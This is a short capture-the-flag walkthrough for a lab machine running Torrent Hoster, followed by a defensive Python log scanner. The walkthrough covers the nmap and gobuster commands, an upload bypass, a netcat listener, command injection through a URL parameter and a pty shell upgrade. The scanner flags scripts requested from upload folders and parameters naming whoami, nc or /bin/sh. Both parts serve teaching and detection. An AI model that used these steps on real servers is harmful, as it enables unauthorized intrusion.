Difficulty: Medium
Machine Creator: ch4p
Tools Used: NMAP, Gobuster, Searchsploit, PHP, Burp Suite, Python
Task: To find User.txt and Root.txt
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.6
We have verified that there is a web server, so we can start by scanning the website for directories.
gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40
A searchsploit search shows that the Torrent Hoster webpage is vulnerable to uploads.
Here I’ve uploaded a new logo for our kali torrent.
I’m starting Burp Suite and repeating the same process of uploading the screenshot while using Burp as a proxy.
echo "<Base64 Hash>" | base64 -d > file
Now we can start uploading an exploit to this server.
We need to set up our local netcat listener:
nc -lvnp 1234
In the URL, we can execute netcat on the remote server by replacing whoami with the netcat command.
python -c 'import pty; pty.spawn("/bin/sh")'
Python PTY Shells
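From the defender's side, the steps above leave a clear trace in the web server's access log: a script requested from the upload directory, with a command in the query string. The following is an added example, not part of the original write-up, that flags such requests; the /site/uploads/ path, the cmd parameter name, the extension list and the log lines are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumptions (not from the write-up): the upload directory name, the script
# extensions the server may execute, and the Apache "combined" log format.
UPLOAD_DIRS = ("/uploads/",)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)")  # also catches x.php.png
CMD_TOKENS = re.compile(r"(?:\b(?:whoami|nc|netcat)\b|/bin/sh)", re.I)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /site/uploads/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /site/upload_form.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:01:30 +0000] "GET /site/uploads/shot.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /site/uploads/a.PHP5 HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.4 - - [01/Jan/2024:10:02:05 +0000] "GET /site/uploads/pic.php.png HTTP/1.1" 200 88 "-" "curl/8.0"
"""

def classify(line):
    """Return (client, path, reasons) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    filename = path.rsplit("/", 1)[-1]
    # An upload directory should only ever serve static files, so any
    # script-typed name requested from it is worth an alert on its own.
    if not (any(d in path for d in UPLOAD_DIRS) and SCRIPT_EXT.search(filename)):
        return None
    reasons = ["script-in-upload-dir"]
    if status == "200":
        reasons.append("served-200")  # the file exists and was served
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if CMD_TOKENS.search(value):  # parse_qsl already URL-decodes the value
            reasons.append(f"command-like-param:{key}")
    return (client, url.path, reasons)

def scan(log_text):
    """Classify every line of a log and return only the suspicious hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The first rule also points at the mitigation: if the upload directory is configured so the server never executes scripts from it, a request like this returns the file as data instead of running it.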